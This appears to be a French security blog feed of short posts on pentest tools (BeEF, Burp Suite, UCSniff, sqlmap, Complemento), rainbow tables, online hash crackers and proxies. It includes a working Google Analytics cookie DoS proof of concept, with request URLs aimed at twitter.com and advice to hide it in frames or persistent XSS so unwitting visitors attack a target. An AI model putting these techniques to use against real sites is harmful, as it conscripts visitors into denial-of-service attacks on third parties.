BeEF nouveau module

Nouveaux module pour BeEF le browser exploitation framework:

IE unsafe ActiveX Control Detection

"Remote detection through IE (of the availability) of unsafe ActiveX controls is achievable. A script can attempt to access an unsafe control and then check if it succeeds."


Si ca vous interesse: bindshell

Bonus:


pk ? en réponse à ce commentaire (oui sinon c'est HS...mais bon comme ca pas de jalousie) :D
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

4To de rainbow tables en free download

C'est pas spécialement nouveau mais un nouveau miroir vien d'apparaitre pour le téléchargement des rainbow table de chez freerainbowtable.
Etant donné que c'est des rainbow table compressé, pour les faire tourner vous avez besoin du logiciel rcracki une version modifié de rcrack, c'est gratuit.

le 3 ème miroir: RT.0×80.org

precedent post: rainbow tables 4To
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

tite vuln chez NEOCMS

Une vulnérabilté de type XSS chez NEOCMS pouvant entrainer la récupération d'un cookie.
Le vendeur est à ce jour non contacté.

Si ca vous intéresse ca se passe chez: Math²'s blog

Sinon, j'ai réalisé un tuto il y a un moment, qui reprend une bonne video d'explication: tuto XSS

A noter que ce type de vulnérabilité est super fréquente (il y en a une sur la boutique des pompiers de france, je ne sais pas si elle a été corrigé, admin non contacté, flémingite aigu), backlink pompier de france (histoire qu'il passe sur le post)

image (auteur de la découverte)
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

jaunty fix Failed to contact the GConf daemon; exiting.

Petit bug sur Ubuntu Jaunty, si vous lancez xterm et depuis votre term vous voulez lancez un "sudo gnome-terminal" il sort Failed to contact the GConf daemon; exiting.
Le problème c'est que si vous avez une application qui se sert de cette commande, bein forcément ca va échouer

Ducoup voici mon pseudo fix, plustot que d'utiliser gnome-terminal on va utiliser terminator (il est bien en plus)

donc le pseud fix consiste en:

sudo su
apt-get install terminator

mv /usr/bin/gnome-terminal /usr/bin/gnome-terminal2
cp /usr/bin/terminator /usr/bin/gnome terminal

en gros quand gnome-terminal va être appellé c'est terminator qui va se lancer, et quand terminator va être appelé, bein c'est terminator qui va être appelé.

J'espère que ca pourra en dépanner :)


pour la restauration:
sudo su
rm -f /usr/bin/gnome-terminal
mv /usr/bin/gnome-terminal2 /usr/bin/gnome-terminal

Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

burpsuite 1.2.01

Sortie de burpsuite 1.2.01 pour la version gratuite, et aussi update de la version pro, burpsuite est l'outil indispensable pour le pentest web, la nouvelle version inclu un nouvel éditeur textuel pour les réponses HTTP raw.
Burpsuite est écrit en java, et est multiplateforme.

si ca vous interesse:
direct download (pour la version free):

http://portswigger.net/suite/burpsuite_v1.2.01.zip

#(install)
wget http://portswigger.net/suite/burpsuite_v1.2.01.zip
unzip burp*
rm -rf *.zip
#(requiert java)

site officiel: PortSwigger
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

UCSNIFF 2.1 pour le pentest VOIP

UCSNIFF est un outil destiné aux test de sécurités sur la VOIP (voice over internet), il permet le sniff et le MITM (man in the middle)
il y est notament inclu le support de la video, vous pouvez donc enregistrer les videos, nous allons l'installer sous ubuntu jaunty, mais avant quelques captures (officiel)


Regardez cette capture:

ca ne vous dit rien?

Oui ca ressemble à un logiciel que beaucoup utilisent, "ettercap"
normal ca se base dessus, bon installons le:
(a vous de gérer les répertoires, car moi j'ai téléchargé compilé, dans /pentest/voip)
(le ettercap c'est pour activer les pluggin dans ucsniff, je pense que c'est necessaire)


apt-get install ffmpeg libavformat-dev libavdevice-dev mplayer mencoder libavformat-dev libavedeice-dev zlib1g-dev liblzo-dev libpcap0.8-dev libnet1-devlibasound2-dev libbz2-dev ettercap-gtk

cd
svn checkout svn://svn.ffmpeg.org/ffmpeg/trunk ffmpeg
cd ffmpeg
./configure
make
make install
cd ..
rm -rf ffmpeg
cd /pentest/voip
wget http://freefr.dl.sourceforge.net/sourceforge/ucsniff/ace-1.4.tar.gz
wget http://freefr.dl.sourceforge.net/sourceforge/ucsniff/arpsaver.tar.gz
wget http://freefr.dl.sourceforge.net/sourceforge/ucsniff/ucsniff-2.1.tar.gz
tar zxvf *.gz
rm -rf *.gz
cd ace-1.4
make
cd ../arpsaver
make
cd ../ucsniff-2.1
./configure --enable-video-decoder --enable-plugins
make && make install

Voila amusez vous bien avec cette outil :)

le help:

root@l:~# ucsniff --help
UCSniff 2.1 starting

Usage: UCSniff [OPTIONS] [TARGET1] [TARGET2]

TARGET is in the format MAC/IPs/PORTs (see the man for further detail)

Basic Mode Options:
-M Enables Monitor Mode
// // Enables MitM Learning Mode
-T Enables MitM Target Mode

VLAN Hop Options:
-v --vlan "vvid" VLAN Hop into specified VVID
-c --cdp 0 Auto-discover Voice VLAN via CDP Sniffing
-c --cdp 1 Auto-discover Voice VLAN via CDP Spoofing

Directory Download Options:
-a --ace Enables ACE function for directory download
-m --mac "mac" MAC Address of valid IP Phone
-t, --tftp "ip" Manually connect to this TFTP Server instead of using DHCP Option 150

Sniffing and Attack options:
-o, --only-mitm don't sniff, only perform the mitm attack
-B, --bridge "iface" use bridged sniff (needs 2 ifaces)
-p, --nopromisc do not put the iface in promisc mode
-u, --unoffensive do not forward packets
-r, --read "file" read data from pcapfile "file"
-f, --pcapfilter "string" set the pcap filter "string"
-R, --reversed use reversed TARGET matching

Logging options:
-w, --write "file" write sniffed data to pcapfile "file"
-L, --log "logfile" log all the traffic to this "logfile"
-l, --log-info "logfile" log only passive infos to this "logfile"
-c, --compress use gzip compression on log files

Visualization options:
-d, --dns resolves ip addresses into hostnames
-V, --visual "format" set the visualization format
-e, --regex "regex" visualize only packets matching this regex
-E, --ext-headers print extended header for every pck
-Q, --superquiet do not display user and password

General options:
-i, --iface "iface" use this network interface
-I, --iflist show all the network interfaces
-n, --netmask "netmask" force this "netmask" on iface
-P, --plugin "plugin" launch this "plugin"
-F, --filter "file" load the filter "file" (content filter)
-z, --silent do not perform the initial ARP scan
-j, --load-hosts "file" load the hosts list from "file"
-k, --save-hosts "file" save the hosts list to "file"
-W, --wep-key "wkey" use this wep key to decrypt wifi packets

Standard options:
-U, --update updates the databases from ettercap website
-h, --help this help screen


root@l:~#

le site officiel: ucsniff
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

sandbox google pour PDF TIFF powerpoint

Le blog de gmail vient d'annoncer le support de nouveaux formats de fichier au sein de googledocs.
Maintenant il supporte les documents powerpoint et tiff, biensur il supporte aussi les pdf.

Le fait interessant est de pouvoir lire son document au sein de google docs et donc de n'encourir aucun risques pour votre ordinateur. (zero day power point il y a peu)


source:
http://gmailblog.blogspot.com/
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

DoS via google analytics cookie contre un serveur web

Un collaborateur au forum elhacker vient de sortir un PoC (proof of concept) utilisant google analytics contre un serveur web pour réaliser un DoS (deni de service), il se sert de la longueur du cookie.

L'attaque peut être dangereuse dans le cas d'une XSS permanante par exemple, le but étant de dissimuler une frame sur un web site ayant un grand nombre de visiteurs pour que l'attaque soit éfficace.

Regardons de plus près avec l'extention firefox tamperdata qui permet de bloquer modifier les requètes en direct

Le PoC twitter:

Je lance le PoC:
http://google.sirdarckcat.net/?v=http://twitter.com/

2ème requète qui se lance à la volé:
http://google.sirdarckcat.net/search?q=dagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoo&victim=http://twitter.com/

3ème requète qui se lance à la volé:
http://twitter.com/#gaso=dagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondago

----------------------------------------------------------------
Refresh automatique, twitter refuse le cookie qui dépasse la valeur autorisé par apache, et ainsi de suite

http://google.sirdarckcat.net/search?q=dagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoo&victim=http://twitter.com/

http://twitter.com/#gaso=dagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondagoogleweapondago


Donc au cas ou ca passe pas sans textarea, la requète en raccourcis:

http://google.sirdarckcat.net/search?q=dagoogleweapon&victim=http://twitter.com/

ce qui envoi celle ci
http://twitter.com/#gaso=dagoogleweapon

D'ou si je place une frame sur le blog par exemple, qui utilise le PoC chaque utilisateur venant sur le blog va lancer le PoC contre la cible choisit, sans même le savoir (enfin pour la pluspart), et suivant le nombre de personnes connecté au blog + le temps que la personne reste et le type de cible visé cela peut faire très mal.
Ou une XSS permanente sur un site populaire et c'est le carton...

Pour plus d'informations je conseil la lecture du blog qui en à fait l'annonce:

sirdarckcat
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

extracteur de metadata online

Foca online est un service permettant d'extraire les metadatas de divers document tel que: .sxw .odt .ods .odg .odp .docx .xlsx .pptx .ppsx .doc .xls .ppt .pps .pdf
ce qui est utile dans les meta c'est que vous pouvez avoir le nom d'une personne etc, par éxemple, je souhaite tester un site, je peux regarder les metadata des documents présents sur le site et créer une wordlist avec des variantes du nom ou adresse mail, pseudo etc...

ou pour préparer autre chose, peut importe c'était juste un éxemple...

Si ca vous interesse: FOCA
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

rainbow table lm ntlm md5 sha1 en download

Un total de 4To de rainbow table en free download, elle proviennent de chez freerainbowtables, lm ntlm md5 fastlm sha1
Elles sont donc compressés pour les utiliser vous avez besoin de rcracki, il est prevu pour windows.

site officiel et miroir

table wpa pour cowpatty

source MatToufoutu [irc freenode]
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

ONLINE HACKING TOOLS

Ceci est un post concernant les services sur internet gratuits et intéréssants, whois, crack de password md5 lm nt, ip location, traceroute, scaner de ports, url obfuscation, encodage / décodage...
Pour commencer mon préféré qui est ultra complet

http://w3dt.net/

• Network Internet:

Dns lookup | Dns traversal | Port Scan | Trace Route | arbl check (blacklist / withelist) | mtu route | netbios scan | wake on lan (WoL) | CIDR/Netmask Calculator | Dns Report | NTP Server Test | MX Records Retriever | Reverse DNS scan | DNS Server Fingerprint

• Web HTTP:

HTTP Header Retrieval | Plain Text WEB/URL Browser | HTTPRecon (HTTP Fingerprinting) | IIS Web Sites List | Meta Tags Retrieval | URL Encode / Decode | RAW URL Encode / Decode | Base64 Encode /Decode

• Database Lookups:

RFC Lookup | Mac Address Lookup | Default Password Lookup | Abuse Contact Lookup | IP/Host Locator | WhoIS Lookup

• General Tools:

Random Character Generator | Hash Test | IP Conversion Utility

• Ping Tools:

Ping | Webping | pathping | TCPing | Ping-Row

• Lists:

RFC List | MAC Address List | Default Password List

--------------------------------------------------------------------------------------------------------------------------------

Un second qui est très bon aussi:

http://www.t1shopper.com/tools/

Traceroute || Ping || NSLookup || Whois || Simple Port scan

Speedtest || Subnet Calculator || Advanced Port Scan || File Size Calculator || File Transfert Calculator

--------------------------------------------------------------------------------------------------------------------------------

http://member.dnsstuff.com/

[whois/ipwhois lookup] [country ip range lookup] [rfc lookup] [punycode converter] [radb routing] [ip information] [cse html validator] [url deobfuscator] [wake on lan] [free e-mail lookup] [traceroute] [random number generator] [country tool] [decimal IPs]

--------------------------------------------------------------------------------------------------------------------------------

Translator binary

encodes and decodes ASCII and ANSI [ text | binary | hex | base64 | dec/char | message digest / checksum ]

--------------------------------------------------------------------------------------------------------------------------------

View HTTP Request and Response Header

--------------------------------------------------------------------------------------------------------------------------------

Iplocator geobytes

--------------------------------------------------------------------------------------------------------------------------------

Whois.net

--------------------------------------------------------------------------------------------------------------------------------

nmap online

--------------------------------------------------------------------------------------------------------------------------------

Anonymity:

anonymouse

hide my ass

proxify

Proxy:

proxy.org

freeproxy.ru

---------------------------------------------------------------------------------------------------------------------------------

Password cracker

* Online LM Cracker offensive-security.com
* Online LM/NT Cracker - securitystats.com
* Online MD5 Cracker - gdataoneline.com
* Online MD5 Cracker - tmto.org
* Online MD5 Cracker - rednoize.com
* Online MD5 Cracker - md5this.com
* Online MD5 Cracker - xmd5.org
* Online MD5 Cracker - milw0rm.com
* Online MD5 Cracker - plain-text.info
* Online MD5 Cracker - hashchecker.com
* Online MD5 Cracker - schwett.com
* Online MD5 Cracker - cmd5.comProject

Password list

enjoy :)

Bonus 1 et 2 (cool search) 3 (convertisseur de texte vers art ascii) 4 (convertisseur d'image vers art ascii)
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

complemento 0.7 tcp flooder dommain scanner et http server scanner

Complemento passe en version 0.7, une collection d'outils destiné au pentesting, il se compose:

d'un tcp flooder "letdown" qui est basé sur Fyodor NDos, il permet des attaques de type dos (deni de service), il est expérimental et joue avec le tcp/ip stack userland, il a été programmé en prenant en compte des notes de chez insecure

Un scanner de domaine "Reverse raider", il permet le bruteforce de sous domaines, il est basé sur DomainScanner réalisé par Jeremy Brown
(supporte ipv6 des options pour le dns etc)

Un scanner de serveur http "httpsquash", il permet de scanner un website, il se base sur les signatures de httprecon
(httprecon est disponible pour les plateforme windows, il est opensource, et écrit en vb6)

si ca vous interesse ca tourne sous linux et c'est dispo: ici
vous avez aussi un tutorial complet sur son utilisation: ici
Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

Sqlmap 0.7 release candidate 1

Sqlmap 0.7 release candidate 1 vient de sortir, sqlmap permet de tester des injections sql.
Sqlmap automatise une injection sql, il se gère en ligne de commande, il supporte entierement mysql oracle postgresql mssql, vous pouvez tester des blind sql etc

plus d'infos et le download:
site: sqlmap

Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

les outils de backtrack dans votre ubuntu

Depuis que backtrack est passé en version 4, ils sont passé sur une base ubuntu, avant c'était slackware. De plus ils ont créé un dépot comprenant les outils de backtrack.
Donc si vous avez une ubuntu vous pouvez prendre quelques outils chez eux...
Attention le dépot ne dispose pas de toutes les dependances, donc pour certain truc ca ne passera pas, mais tous les petits scripts sympa etc vous pouvez les prendres...

Pour bénéficier de cela:
sudo gedit /etc/apt/sources.list

et on rajoute la ligne apt
deb http://repo.offensive-security.com/dist/bt4 binary/


Vous allez avoir une erreur de clé mais c'est pas grave...


Maintenant on peut voir les outils et se servir (en douceur un)

On test, j'ai choisit amap qui n'était pas présent sur mon système et qui est parfaitement fonctionnel.
J'ai aussi taxé list-url, sur mon système je disposais du dossier /pentest mais pas enumération, il me l'a fait et fait le dossier list-url avec le script python dedans...


Lire la suite...

Un problème? Venez en parler sur le forum, tout a une solution :D

